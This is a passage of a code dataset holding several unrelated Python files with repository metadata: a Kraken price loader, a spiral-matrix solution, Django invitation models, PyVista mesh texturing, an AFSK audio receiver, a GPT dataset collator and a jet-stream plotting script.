_convert_map:\n currency = _convert_map[currency]\n try:\n index = bootstrap_index('../data/bootstrap/index.yaml')\n transformer = load_transformer('../data/bootstrap/' + index.kraken.transformer)\n if index.kraken.groups:\n raise ValueError('Groups are not supported for kraken Loader')\n filename = index.kraken.name_format.format(symbol=symbol.upper(), currency=currency.upper()) + '.csv'\n return transformer.get_df('../data/bootstrap/' + index.kraken.zipfile, filename)\n except Exception as e:\n print('Exception occurred! 
' + str(e))\n raise\n\n\ndef ticks_to_ohlcv(ticks, interval):\n resample = ticks.resample(interval)\n ohlc = resample['price'].ohlc()\n ohlc['volume'] = resample['amount'].sum()\n return ohlc","repo_name":"RedLicorice/cryptoml","sub_path":"src/crawlers/kraken.py","file_name":"kraken.py","file_ext":"py","file_size_in_byte":1734,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"16"} +{"seq_id":"10348976074","text":"# Given a matrix of m x n elements (m rows, n columns), return all elements of\n# the matrix in spiral order.\n#\n# For example,\n# Given the following matrix:\n#\n# [\n# [ 1, 2, 3 ],\n# [ 4, 5, 6 ],\n# [ 7, 8, 9 ]\n# ]\n# You should return [1,2,3,6,9,8,7,4,5].\n\n# The thing is to restrict the list of the for sides: up bound, right bound,\n# down bound, left bound. Each time finish one strip, update the corresponding\n# bound. if the bound goes to the strip that has been scanned, means job done,\n# return the result\n\ndef spiralOrder(self, matrix):\n \"\"\"\n :type matrix: List[List[int]]\n :rtype: List[int]\n \"\"\"\n rt = []\n m = len(matrix)\n if m == 0:\n return rt\n n = len(matrix[0])\n\n u, r, d, l = 0, n - 1, m - 1, 0\n while True:\n for col in range(l, r + 1, 1):\n rt.append(matrix[u][col])\n u += 1\n if u > d:\n break\n for row in range(u, d + 1, 1):\n rt.append(matrix[row][r])\n r -= 1\n if r < l:\n break\n for col in range(r, l - 1, -1):\n rt.append(matrix[d][col])\n d -= 1\n if d < u:\n break\n for row in range(d, u - 1, -1):\n rt.append(matrix[row][l])\n l += 1\n if l > r:\n break\n return rt\n","repo_name":"suafeng/BaldmanBolder","sub_path":"54_spiral_matrix.py","file_name":"54_spiral_matrix.py","file_ext":"py","file_size_in_byte":1411,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"16"} +{"seq_id":"22767562918","text":"from random import random\n\nfrom hashlib import sha1 as sha_constructor\n\nimport django\n\nfrom django.db import models\nfrom django.db.models import signals\nfrom django.core.validators import validate_email\nfrom django.core.exceptions import ValidationError\nfrom django.conf import settings\n\nfrom social.apps.django_app.default.fields import JSONField\nfrom social.apps.django_app.default.models import UID_LENGTH, UserSocialAuth\n\nfrom .signals import relation_linked, relation_joined\n\n\nclass RelationManager(models.Manager):\n def contribute_to_class(self, cls, name):\n signals.post_save.connect(self.post_save, sender=cls)\n\n super(RelationManager, self).contribute_to_class(cls, name)\n\n def post_save(self, instance, *args, **kwargs):\n if kwargs.get('created', False) and instance.to_user_id:\n relation_linked.send(sender=instance.__class__,\n instance=instance,\n user=instance.to_user)\n\n\nclass Relation(models.Model):\n name = models.CharField(max_length=255, null=True, blank=True)\n from_user = models.ForeignKey(settings.AUTH_USER_MODEL, related_name='relations_sent')\n to_user = models.ForeignKey(settings.AUTH_USER_MODEL,\n related_name='relations_received',\n null=True,\n blank=True)\n provider = models.CharField(max_length=32, db_index=True)\n uid = models.CharField(max_length=UID_LENGTH, db_index=True)\n extra_data = JSONField()\n\n objects = RelationManager()\n\n class Meta:\n \"\"\"Meta data\"\"\"\n unique_together = ('from_user', 'provider', 'uid')\n db_table = 'fairepart_relation'\n\n def is_uid_email(self):\n try:\n validate_email(self.uid)\n except ValidationError:\n return False\n else:\n return True\n\n\nclass 
Invitation(models.Model):\n from_user = models.ForeignKey(settings.AUTH_USER_MODEL, related_name='invitations_sent')\n to_user = models.ForeignKey(settings.AUTH_USER_MODEL,\n related_name='invitations_received',\n null=True,\n blank=True)\n email = models.EmailField()\n text = models.TextField(blank=True, null=True)\n token = models.CharField(max_length=40)\n\n class Meta:\n db_table = 'fairepart_invitation'\n\n def save(self, *args, **kwargs):\n if not self.token:\n salt = sha_constructor(str(random())).hexdigest()[:5]\n\n self.token = sha_constructor(salt + self.email).hexdigest()\n\n return super(Invitation, self).save(*args, **kwargs)\n\n\ndef handle_user(sender, instance, *args, **kwargs):\n if kwargs.get('created', False) and instance.email:\n relations = Relation.objects.filter(uid=instance.email, to_user__isnull=True)\n\n for relation in relations:\n relation.to_user = instance\n\n relation_joined.send(sender=Relation,\n instance=relation,\n user=instance)\n\n relations.update(to_user=instance)\n\n\ndef handle_user_social_auth(sender, instance, *args, **kwargs):\n if kwargs.get('created', False) and instance.uid:\n relations = Relation.objects.filter(uid=instance.uid, to_user__isnull=True)\n\n for relation in relations:\n relation.to_user = instance.user\n\n relation_joined.send(sender=Relation,\n instance=relation,\n user=instance.user)\n\n relations.update(to_user=instance.user)\n\n\nsignals.post_save.connect(handle_user_social_auth, sender=UserSocialAuth)\n\nif django.VERSION < (1, 7):\n from .compat import User\n\n signals.post_save.connect(handle_user, sender=User)\nelse:\n from django.apps import apps\n\n if apps.ready:\n from .compat import User\n\n signals.post_save.connect(handle_user, sender=User)\n","repo_name":"thoas/django-fairepart","sub_path":"fairepart/models.py","file_name":"models.py","file_ext":"py","file_size_in_byte":3983,"program_lang":"python","lang":"en","doc_type":"code","stars":5,"dataset":"github-code","pt":"16"} +{"seq_id":"5708416910","text":"import numpy as np\nimport pandas as pd\nimport pyvista as pv\nfrom pyvista import examples\n\n# shirts_path = './models/shirts/shirts_simple.obj'\n# img_file = './models/shirts/up_dog.jpg'\nshirts_path = './models/Artec3D/Pasha_guard_head.obj'\nimg_file = './models/Artec3D/Pasha_guard_head_0.png'\n\ntex = pv.read_texture(img_file)\n\n# Manually parse the OBJ file because meshio complains\nraw_data = pd.read_csv(shirts_path, header=None, comment=\"#\",\n delim_whitespace=True, names=[\"type\", \"a\", \"b\", \"c\"])\ngroups = raw_data.groupby(\"type\")\n# from IPython.core.debugger import Pdb; Pdb().set_trace()\nv = groups.get_group(\"v\")\nf = groups.get_group(\"f\")\nvt = groups.get_group(\"vt\")[[\"a\", \"b\"]].values.astype(float)\nvertices = v[[\"a\", \"b\", \"c\"]].astype(float).values\n# fa = np.array([(int(x[0]), int(x[1]), int(x[2])) for x in f[\"a\"].str.split(\"/\")])\n# fb = np.array([(int(x[0]), int(x[1]), int(x[2])) for x in f[\"b\"].str.split(\"/\")])\n# fc = np.array([(int(x[0]), int(x[1]), int(x[2])) for x in f[\"c\"].str.split(\"/\")])\nfa = np.array([(int(x[0]), int(x[1])) for x in f[\"a\"].str.split(\"/\")])\nfb = np.array([(int(x[0]), int(x[1])) for x in f[\"b\"].str.split(\"/\")])\nfc = np.array([(int(x[0]), int(x[1])) for x in f[\"c\"].str.split(\"/\")])\nfaces = np.c_[fa[:,0], fb[:,0], fc[:,0]] - 1 # subtract 1\n#### End manual parsing\n\n# Create the mesh\ncells = np.c_[np.full(len(faces), 3), faces]\nmesh = pv.PolyData(vertices, cells)\n\n# Generate the tcoords on the faces\nctcoords = 
np.c_[fa[:,1], fb[:,1], fc[:,1]] - 1 # subtract 1\nui, vi = ctcoords[:,0], ctcoords[:,1]\ncuv = np.c_[vt[:,0][ui], vt[:,1][vi]]\nmesh.cell_arrays[\"Texture Coordinates\"] = cuv\n\n# Interpolate the cell-based tcoords to the points\nremesh = mesh.cell_data_to_point_data()\n# Register the array as texture coords\nremesh.t_coords = remesh.point_arrays[\"Texture Coordinates\"]\n\n# Plot it up, yo!\nremesh.plot(texture=tex)\n\n# model_path = './models/Artec3D/Pasha_guard_head.obj'\n# texture_path = './models/Artec3D/Pasha_guard_head_0.png'\n# plt = pv.Plotter()\n# mesh = pv.read(model_path)\n# tex = pv.read_texture(texture_path)\n# # plt.add_mesh(mesh, texture=tex)\n# plt.add_mesh(mesh)\n# plt.set_background((19/255, 19/255, 36/255), (130/255, 134/255, 243/255))\n# plt.show(cpos=\"xy\")\n","repo_name":"DXCn7wNe/python-snippet","sub_path":"pyvista_test.py","file_name":"pyvista_test.py","file_ext":"py","file_size_in_byte":2218,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"16"} +{"seq_id":"33220510273","text":"from json import load\r\nfrom abc import ABC, abstractmethod\r\nfrom typing import Union\r\n\r\n\r\nclass Extractor(ABC):\r\n def __init__(self, path_doc: str, cfg=None) -> None:\r\n self.__cfg: Union[dict, None] = cfg\r\n\r\n with open(path_doc, 'r', encoding='UTF-8') as file:\r\n self.__json_file: list = load(file)\r\n\r\n @staticmethod\r\n def __format_tuple(raw_tuple: tuple[int]) -> tuple[int]:\r\n if len(raw_tuple) == 2:\r\n raw_tuple += (1,)\r\n elif len(raw_tuple) == 1:\r\n raw_tuple: tuple[int, None, int] = (-raw_tuple[0], None, 1)\r\n\r\n return raw_tuple\r\n\r\n @abstractmethod\r\n def extract_events(self, range_events: tuple[int]):\r\n self.__formatted_tuple: tuple[int] = self.__format_tuple(range_events)\r\n\r\n @property\r\n def json_file(self) -> list:\r\n return self.__json_file\r\n\r\n @property\r\n def cfg(self) -> Union[dict, None]:\r\n return self.__cfg\r\n\r\n @property\r\n def formatted_tuple(self) -> tuple[int]:\r\n return self.__formatted_tuple\r\n\r\n\r\nclass ExtractorFromSite(Extractor):\r\n def extract_events(self, range_events: tuple[int]) -> list[dict]:\r\n super().extract_events(range_events)\r\n return self.json_file[self.formatted_tuple[0]:self.formatted_tuple[1]:self.formatted_tuple[2]]\r\n\r\n\r\nclass ExtractorFromPublic(Extractor):\r\n def extract_events(self, range_events: tuple[int]) -> list[str]:\r\n super().extract_events(range_events)\r\n\r\n post_list: list[str] = []\r\n for public in self.cfg['public']:\r\n for post in self.json_file[public]:\r\n post_list.append(post['text'])\r\n\r\n return post_list\r\n\r\n\r\n# Тест!\r\nextractor_from_site = ExtractorFromSite('data/Event_List_10_09_2022_17_38_.json')\r\ncfg = {'public': (\"afisha.almet\",)}\r\nextractor_from_public = ExtractorFromPublic('data/Posts_List_10_09_2022_18_55_.json', cfg)\r\na = extractor_from_site.extract_events((5,))\r\nb = extractor_from_public.extract_events((5,))\r\nprint(b)","repo_name":"Damir-prg/parser-non-async","sub_path":"extract.py","file_name":"extract.py","file_ext":"py","file_size_in_byte":1999,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"16"} +{"seq_id":"4280441079","text":"import numpy as np\r\nimport scipy.signal as sp\r\n\r\nfrom afsk import AFSK\r\n\r\n\r\nclass Filter:\r\n # generic class to implement the transfer function H(z) = B(z)/A(z)\r\n # the filter also computes the output power via a leaky integrator\r\n def __init__(self, b, a, leak=0.95):\r\n assert len(a) == 
len(b), 'must have same number of coefficients in a and b -- zero pad if necessary'\r\n self.a = a\r\n self.b = b\r\n self.N = len(a)\r\n self.y = [0] * self.N\r\n self.x = [0] * self.N\r\n self.ix = 0\r\n self.value = 0\r\n self.leak = leak\r\n self.power = 0\r\n\r\n def compute(self, x):\r\n self.x[self.ix] = x\r\n self.value = self.b[0] * x\r\n for n in range(1, self.N):\r\n k = (self.ix + self.N - n) % self.N\r\n self.value += self.b[n] * self.x[k] - self.a[n] * self.y[k]\r\n self.y[self.ix] = self.value\r\n self.ix = (self.ix + 1) % self.N\r\n self.power = self.leak * self.power + (1 - self.leak) * self.value * self.value\r\n return self.value\r\n\r\n\r\nclass EllipticBandpass(Filter):\r\n def __init__(self, order, center, bw, Fs, ripple=2.5, att=50, leak=0.95):\r\n W = np.array([center - bw / 2, center + bw / 2]) / (Fs / 2)\r\n super().__init__(*sp.ellip(order, ripple, att, W, btype='bandpass'), leak=leak)\r\n\r\n\r\nclass Notch:\r\n # simple complex-zero-pair notch filter used for phase reversal detection\r\n def __init__(self, center, Fs):\r\n self.c = -2 * np.cos(2 * np.pi * center / Fs)\r\n self.x1 = 0\r\n self.x2 = 0\r\n self.value = 0\r\n\r\n def compute(self, x):\r\n self.value = x + self.c * self.x1 + self.x2\r\n self.x2 = self.x1\r\n self.x1 = x\r\n return self.value\r\n\r\n\r\nclass AGC:\r\n # automatic gain control circuit\r\n def __init__(self, target, alpha=0.01):\r\n self.max_gain = 100\r\n self.target = target\r\n self.alpha = alpha\r\n self.gain = 1\r\n\r\n def set_speed(self, alpha):\r\n self.alpha = alpha\r\n\r\n def update(self, x):\r\n self.gain += self.alpha * (self.target - abs(x))\r\n if self.gain > self.max_gain:\r\n self.gain = self.max_gain\r\n\r\n\r\nclass Receiver(AFSK):\r\n # Simple incoherent AFSK receiver. No timing recovery is implemented so keep the bitrate low\r\n # Correct detection hinges on proper synchronization with the timing reference in the preamble\r\n # so if you have burst noise during pilot time, tough luck.\r\n\r\n # state machine\r\n WAIT_PILOT = 0\r\n WAIT_SYNC = 10\r\n WAIT_DATA = 30\r\n ONLINE = 40\r\n\r\n def __init__(self):\r\n # received operates at a fixed rate of 32KHz\r\n self.Fs = 32000\r\n # samples per bit\r\n self.spb = self.Fs / self.BPS\r\n\r\n # leaky integrator to compute signal power\r\n self.signal = Filter([1], [1], leak=0.995)\r\n\r\n # Automatic Gain Control\r\n self.agc_speed = {\r\n 'fast': 0.005,\r\n 'slow': 0.001,\r\n }\r\n self.agc = AGC(1, self.agc_speed['fast'])\r\n self.agc_wait_len = int(self.Fs * 0.3)\r\n\r\n # pilot and timing\r\n self.timing_detector = Notch(self.PILOT_FREQ, self.Fs)\r\n self.reference_power = 0\r\n self.timing_threshold = -2\r\n self.timing_reference = [self.timing_threshold, -1] # threshold, time\r\n\r\n # bandpass filters for PILOT, MARK and SPACE\r\n self.pilot = EllipticBandpass(3, self.PILOT_FREQ, 700, self.Fs, leak=0.99)\r\n self.mark = EllipticBandpass(3, self.MARK_FREQ, 900, self.Fs)\r\n self.space = EllipticBandpass(3, self.SPACE_FREQ, 900, self.Fs)\r\n\r\n # collect incoming bits into bytes\r\n self.decision = 0\r\n self.octet = ''\r\n\r\n # state machine\r\n self.state = self.WAIT_PILOT\r\n self.timer = self.agc_wait_len\r\n self.ix = 0\r\n\r\n def restart(self):\r\n # call this after data is lost to reset the receiver\r\n self.agc.set_speed(self.agc_speed['fast'])\r\n self.signal.power = 0\r\n self.pilot.power = 0\r\n self.timing_reference = self.timing_reference = [self.timing_threshold, -1]\r\n self.decision = 0\r\n self.octet = ''\r\n self.state = self.WAIT_PILOT\r\n 
self.timer = self.agc_wait_len\r\n self.ix = 0\r\n\r\n def receive(self, x):\r\n # automatic gain control\r\n x *= self.agc.gain\r\n self.agc.update(x)\r\n self.signal.compute(x)\r\n\r\n # run all filters\r\n self.pilot.compute(x)\r\n self.mark.compute(x)\r\n self.space.compute(x)\r\n\r\n if self.state == self.WAIT_PILOT:\r\n self.ix = 0\r\n # wait until the power in the pilot band is more than a quarter of total power\r\n if self.pilot.power > 0.25 * self.signal.power:\r\n # start priming the timing detector\r\n self.timing_detector.compute(x)\r\n self.timer -= 1\r\n if self.timer <= 0:\r\n # wait until AGC stabilizes and then move on to synch detection\r\n self.reference_power = 0.25 * self.pilot.power\r\n self.state = self.WAIT_SYNC\r\n print(f'pilot detected ({self.ix})')\r\n else:\r\n self.timer = self.agc_wait_len\r\n\r\n elif self.state == self.WAIT_SYNC:\r\n # detect phase reversal and track location of minimum. The idea is that if you have a 180-degree\r\n # phase jump, the notch filter's output will shoot down to large negative values. Of course for\r\n # this to work you need the signal to be a true sinusoidal pilot.\r\n # This is the most fragile step in the detector\r\n self.timing_detector.compute(x)\r\n if self.timing_detector.value < self.timing_reference[0]:\r\n self.timing_reference = [self.timing_detector.value, self.ix]\r\n # turn off AGC once we detect a sync pulse\r\n self.agc.set_speed(0)\r\n print(f'timing reference: {self.timing_reference}')\r\n if self.pilot.power < self.reference_power:\r\n if self.timing_reference[1] > 0:\r\n # sync was detected; number of samples before data starts:\r\n self.timer = int((self.PILOT_TAIL + self.GAP_LEN) * self.Fs) - (self.ix - self.timing_reference[1])\r\n self.state = self.WAIT_DATA\r\n print(f'pilot end detected at {self.ix}')\r\n else:\r\n print(f'pilot lost')\r\n self.restart()\r\n\r\n elif self.state == self.WAIT_DATA:\r\n # wait until data starts\r\n self.timer -= 1\r\n if self.timer <= 0:\r\n # resume AGC\r\n self.agc.set_speed(self.agc_speed['slow'])\r\n self.timer = self.spb\r\n self.state = self.ONLINE\r\n print(f'data starts ({self.ix})\\n')\r\n\r\n elif self.state == self.ONLINE:\r\n # accumulate power from bandpass filters and decide on bit value at the end of the symbol period\r\n # the PC microphone seems to have an unstable characteristic, so we may need to boost\r\n # one of the filters a bit (not done here)\r\n self.decision += abs(self.mark.value)\r\n self.decision -= abs(self.space.value)\r\n self.timer -= 1\r\n if self.timer <= 0:\r\n self.octet += '1' if (self.decision > 0) else '0'\r\n if len(self.octet) == 8:\r\n print(chr(int(self.octet, 2)), end='', flush=True)\r\n self.octet = ''\r\n self.decision = 0\r\n self.timer += self.spb\r\n if self.signal.power < self.reference_power:\r\n self.restart()\r\n print(f'\\n\\ndata signal lost, waiting for new pilot tone')\r\n\r\n self.ix += 1\r\n\r\n\r\nif __name__ == '__main__':\r\n import pyaudio\r\n import time\r\n\r\n # instantiate the receiver\r\n receiver = Receiver()\r\n\r\n # set up pyaudio for real-time processing\r\n def callback(in_data, frame_count, time_info, status):\r\n for x in np.frombuffer(in_data, dtype=np.int16):\r\n receiver.receive(x / 32767.0)\r\n return None, pyaudio.paContinue\r\n\r\n audio_io = pyaudio.PyAudio()\r\n info = audio_io.get_host_api_info_by_index(0)\r\n numdevices = info.get('deviceCount')\r\n for i in range(0, numdevices):\r\n if (audio_io.get_device_info_by_host_api_device_index(0, i).get('maxInputChannels')) > 0:\r\n 
print(\"Input Device id \", i, \" - \", audio_io.get_device_info_by_host_api_device_index(0, i).get('name'))\r\n\r\n stream = audio_io.open(\r\n input_device_index=-1,\r\n format=audio_io.get_format_from_width(2), # 16 bits per sample\r\n channels=1, # mono input\r\n rate=receiver.Fs,\r\n input=True,\r\n output=False,\r\n frames_per_buffer=1024,\r\n stream_callback=callback)\r\n\r\n stream.start_stream()\r\n while stream.is_active():\r\n time.sleep(1)\r\n stream.stop_stream()\r\n stream.close()\r\n audio_io.terminate()\r\n","repo_name":"bybel/SignalShits","sub_path":"dspdemos/receiver.py","file_name":"receiver.py","file_ext":"py","file_size_in_byte":9248,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"16"} +{"seq_id":"34586239317","text":"# -*- coding: utf-8 -*-\r\n\"\"\"\r\nCreated on Tue Jul 13 08:18:31 2021\r\n\r\n@author: 亚亚\r\n\"\"\"\r\nimport pandas as pd\r\nimport numpy as np\r\n#load the behaviorial directory\r\nsim_path = \"D:/hcpd/hcpd_simplified/behavior_simplified_dictionary.xlsx\"\r\n\r\ndf = pd.read_excel(sim_path)\r\nfor ind, row in df.iterrows():\r\n element = row[2].split(',')\r\n for i in ['version_form', 'comqother']:\r\n if i in element:\r\n df.iloc[ind,1] = row[1]+i\r\n element.remove(i)\r\n df.iloc[ind,2] = ','.join(element)\r\ndf.to_excel(\"D:/hcpd/hcpd_simplified/behavior_simplified_dictionary.xlsx\",index=False)\r\n \r\n \r\n\r\n ","repo_name":"Meanda/hcp-behavior","sub_path":"demo_subtable.py","file_name":"demo_subtable.py","file_ext":"py","file_size_in_byte":639,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"16"} +{"seq_id":"41173761391","text":"vals= [2, 3, 2, 4, 4, 5, 1, 6, 6, 1, 4, 7, 6, 4, 5, 6, 5, 5, 1, 6]\n# first: sort the list\nvals.sort()\n\n# second: create two new array\n# one as a set of the elements in the array\n# the other as a list of the corresponding frequency\nn = 0\nfirst_index = 0\nlast_index = first_index\nfreq_list = []\nelement_list = []\nwhile last_index < len(vals):\n if vals[first_index] == vals[last_index]:\n last_index = last_index + 1\n n = n + 1\n else:\n element_list.append(vals[first_index])\n first_index = last_index\n freq_list.append(n)\n n = 0\n\nelement_list.append(vals[first_index])\nfreq_list.append(n)\nprint(\"element list = \" + str(element_list))\nprint(\"frequency list = \" + str(freq_list))\n\n# create an intermediate list sorting the frequency of the elements\n# this is where the sorting occurs\nintermediate_list = freq_list.copy()\nintermediate_list.sort(reverse = True)\nprint(\"intermediate list = \" + str(intermediate_list))\n\n# find the index of the elements in the intermediate list in the frequency list\nfinal_list = []\nfor i in intermediate_list:\n item_index = freq_list.index(i)\n item = element_list[item_index]\n item_list = []\n item_list.append(item)\n # print the item based on its frequency of occurence\n final_list.extend(item_list * i)\n #remove the items already listed\n freq_list.remove(i)\n element_list.remove(element_list[item_index])\n\nprint(\"final list = \" + str(final_list))\n\n\n","repo_name":"monsur4/sorting-a-list-of-integers","sub_path":"sorter.py","file_name":"sorter.py","file_ext":"py","file_size_in_byte":1449,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"16"} +{"seq_id":"32271690598","text":"from torch.utils.data import Dataset, DataLoader\nimport torch\n\nclass GPTDataset(Dataset):\n def __init__(self, seq_pairs, tokenizer, special_tokens_dict, 
pad_idx):\n self.seq_pairs = seq_pairs\n self.tokenizer = tokenizer\n self.special_tokens_dict = special_tokens_dict\n self.pad_idx = pad_idx\n \n def __len__(self):\n return len(self.seq_pairs)\n\n def __getitem__(self, index):\n return self.seq_pairs[index]\n\n def collate_batch(self, datasets):\n tokens_list, labels_list, attention_mask_list = [], [], []\n\n for dataset in datasets:\n encoded_seq = self.tokenizer(dataset) # 假设 tokenizer 是一个合法的方法\n indexed_tks = encoded_seq[\"input_ids\"]\n attention_mask = encoded_seq[\"attention_mask\"]\n\n tokens_list.append(torch.tensor(indexed_tks))\n labels_list.append(torch.tensor(indexed_tks))\n attention_mask_list.append(torch.tensor(attention_mask))\n\n return self.pad_sequence(tokens_list, labels_list, attention_mask_list) # 请注意,这里需要补充 pad_sequence 方法的定义\n \n def pad_sequence(self, non_pad_token, non_pad_label, non_pad_attn):\n max_size = max([len(ele) for ele in non_pad_token]) # 找出该批次数据中的最长序列的长度\n pad_batch1 = torch.stack([torch.cat([t, torch.LongTensor([self.pad_idx] * (max_size - len(t)))]) for t in non_pad_token])\n pad_batch2 = torch.stack([torch.cat([t, torch.LongTensor([self.pad_idx] * (max_size - len(t)))]) for t in non_pad_label])\n pad_batch3 = torch.stack([torch.cat([t, torch.LongTensor([self.pad_idx] * (max_size - len(t)))]) for t in non_pad_attn])\n return pad_batch1, pad_batch2, pad_batch3","repo_name":"henry3556108/codalab_contest","sub_path":"data_set.py","file_name":"data_set.py","file_ext":"py","file_size_in_byte":1764,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"16"} +{"seq_id":"22688673284","text":"#!/usr/bin/env python\n# -*- coding: utf-8 -*-\n\"\"\"Compare two STJ metrics. Plot limited timeseries and a map.\"\"\"\nimport os\nimport pandas as pd\nimport matplotlib.pyplot as plt\nimport xarray as xr\nimport numpy as np\nimport seaborn as sns\nimport STJ_PV.compare_two_runs as c2r\nfrom mpl_toolkits import basemap as bmp\nimport STJ_PV.run_stj as run_stj\n\nfrom pandas.plotting import register_matplotlib_converters\nregister_matplotlib_converters()\n__author__ = 'Michael Kelleher'\n\nHEM_LIMS = {'nh': [13, 54], 'sh': [-54, -13]}\nINFO = {'ERAI-DB':\n {'file': ('ERAI_PRES_DavisBirner_zmean_1979-01-01_2018-12-31.nc'),\n 'label': 'Davis-Birner'},\n\n 'ERAI-Uwind':\n {'file': ('ERAI_PRES_STJUMax_pres25000.0_y010.0_yN65.0_zmean_'\n '1979-01-01_2018-12-31.nc'), 'label': 'U Max'}}\n\n\ndef draw_map_lines(pmap, axis):\n \"\"\"\n Draw lat/lon and coast lines on a Basemap.\n\n Parameters\n ----------\n pmap : :class:`mpl_toolkits.basemap.Basemap`\n A `Basemap` onto which lines will be drawn\n axis : :class:`matplotlib.axes.Axes`\n Axis reference for `pmap`\n\n Returns\n -------\n None\n\n \"\"\"\n lat_spc = 15\n lon_spc = 60\n line_props = {'ax': axis, 'linewidth': 0.2, 'dashes': [4, 10],\n 'color': '#555555'}\n pmap.drawparallels(np.arange(-90, 90 + lat_spc, lat_spc), **line_props)\n pmap.drawmeridians(np.arange(0, 360 + lon_spc, lon_spc), **line_props)\n pmap.drawparallels(np.arange(-90, 90 + lat_spc * 2, lat_spc * 2),\n labels=[True, False, False, False], **line_props)\n pmap.drawcoastlines(linewidth=0.1, color='#333333', ax=axis)\n circle = pmap.drawmapboundary(linewidth=2, color='white', ax=axis,\n zorder=6, fill_color='none')\n circle.set_clip_on(False)\n\n\ndef get_pvgrad_pos(date):\n \"\"\"\n Get STJ position at all longitudes for PVGrad method.\n\n Parameters\n ----------\n date : :class:`datetime.datetime`\n Selected date to compute STJ metric\n\n Returns\n -------\n jet_lat 
: :class:`numpy.ndarray`\n An array of jet latitude locations (hemisphere, time, lon)\n\n \"\"\"\n # jf_run = run_stj.JetFindRun('./conf/stj_config_erai_theta.yml')\n jf_run = run_stj.JetFindRun(\n './conf/stj_config_erai_monthly_davisbirner_gv.yml'\n )\n # Force update_pv and force_write to be False,\n # optional override of zonal-mean\n jf_run.config['update_pv'] = False\n jf_run.config['force_write'] = False\n jf_run.config['zonal_opt'] = 'mean'\n jet = jf_run.run(date_s=date, date_e=date + pd.Timedelta(days=34),\n save=False)\n try:\n # Remove log file created by JF_RUN, comment\n # this out if there's a problem\n os.remove(jf_run.config['log_file'])\n except OSError:\n print('Log file not found: {}'.format(jf_run.config['log_file']))\n\n return [jet.out_data['lat_{}'.format(hem)] for hem in ['sh', 'nh']]\n\n\ndef plot_annotations(fig, axes, cfill):\n \"\"\"Annotate the map and line plots.\n \"\"\"\n grid_style = {'b': True, 'ls': '-', 'color': 'lightgrey', 'lw': 0.2}\n axes[0, 0].legend(ncol=2, fontsize=plt.rcParams['font.size'])\n axes[0, 0].tick_params(bottom=False, labelbottom=False)\n for idx in range(axes.shape[0]):\n\n # Remove borders from timeseries plot\n sns.despine(ax=axes[idx, 0], left=False, bottom=idx == 0, offset=4)\n # Set the lineplot grid to have `grid_style`\n axes[idx, 0].grid(**grid_style)\n # Rotate y-axis ticks so SH/NH have same\n axes[idx, 0].tick_params(axis='y', rotation=90)\n\n # Add colorbar axis\n cax = fig.add_axes([0.5375, 0.035, 0.45, 0.015])\n cbar = fig.colorbar(cfill, cax=cax, orientation='horizontal')\n # cbar.ax.yaxis.set_ticks_position('right')\n # cbar.ax.yaxis.set_label_position('right')\n\n # Remove border from colorbar\n cbar.outline.set_color('none')\n\n fig.subplots_adjust(left=0.07, bottom=0.05,\n right=0.99, top=0.98,\n wspace=0.03, hspace=0.03)\n\n\ndef plot_labels(fig, figscale):\n \"\"\"Put a, b, c, ... 
on plots.\"\"\"\n labels = {'a': {'x': 0.07, 'y': 0.9}, 'b': {'x': 0.07, 'y': 0.45},\n 'c': {'x': 0.56, 'y': 0.9}, 'd': {'x': 0.56, 'y': 0.45}}\n\n for label in labels:\n fig.text(**labels[label], s=f'({label})', fontsize=figscale * 9.0)\n\n\ndef main(width=174, figscale=1.0, extn='png'):\n \"\"\"Load data, make plots.\"\"\"\n # Parameters, labels, etc.\n in_names = ['ERAI-DB', 'ERAI-Uwind']\n labels = [INFO[name]['label'] for name in in_names]\n\n dates = {'nh': pd.Timestamp('2018-05-01'),\n 'sh': pd.Timestamp('2017-03-01')}\n\n nc_dir = './jet_out'\n wind_dir = '/Volumes/data/erai/monthly/'\n theta_lev = 300\n\n # Set the font to sans-serif and size 9 (but scaled)\n plt.rc('font', family='sans-serif', size=9 * figscale)\n # Adjust the title padding to bring it closer\n # this won't work under axis.set_title???\n plt.rc('axes', titlepad=-5.0)\n\n # Assign colors to labels so lines on timeseries and map are the same color\n cols = {labels[0]: '#0D1317', labels[1]: '#5755BA'}\n\n # Set contour levels for map,\n u_contours = np.arange(-45, 50, 5)\n # Load file diags using compare_two_runs.FileDiag and append two metrics\n fds = [c2r.FileDiag(INFO[in_name], file_path=nc_dir)\n for in_name in in_names]\n data = fds[0].append_metric(fds[1])\n\n # Make timeseries plot for each hemisphere, and map for selected date\n # Scale the figure size\n fig_w, fig_h = (figscale * width / 25.4, figscale * width / 25.4)\n\n # Make a 2 x 2 subplot\n fig, axes = plt.subplots(2, 2, figsize=(fig_w, fig_h))\n for idx, dfh in enumerate(data.groupby('hem')):\n # Hemisphere key-name\n hem = dfh[0]\n\n # Plot timeseries for each method\n for kind, dfk in dfh[1].groupby('kind'):\n axes[idx, 0].plot(dfk.lat, label=kind, color=cols[kind], lw=2.0)\n sct_opts = {'edgecolor': cols[kind], 'facecolor': 'white',\n 'marker': 'o', 'zorder': 5}\n\n axes[idx, 0].scatter(dfk[dfk.time == dates[hem]].time.values,\n dfk[dfk.time == dates[hem]].lat.values,\n **sct_opts)\n\n # Label the timeseries\n axes[idx, 0].set_ylabel(c2r.HEMS[hem])\n\n # Restrict to 2010-2016\n axes[idx, 0].set_xlim([pd.Timestamp('2012-01-01'),\n pd.Timestamp('2018-12-31')])\n\n # Show which date is being plotted in the map with a verical line\n axes[idx, 0].axvline(dates[hem], color='k', ls='--', lw=1.1, zorder=0)\n\n # left-ward extent, limit the y-axis\n axes[idx, 0].set_ylim(HEM_LIMS[hem])\n\n # Open ERAI data to extract zonal wind\n dsw = xr.open_dataset(f'{wind_dir}/erai_pres_{dates[hem].year}.nc')\n\n # Select the correct day and level from the u-wind\n uwnd = dsw.sel(time=dates[hem], level=theta_lev).u\n\n # Get latitude and add cyclic point from longitude\n lat = uwnd.latitude.values\n uwnd, lon = bmp.addcyclic(uwnd.values, uwnd.longitude.values)\n\n # Generate a {s/n}pstere Basemap\n pmap = 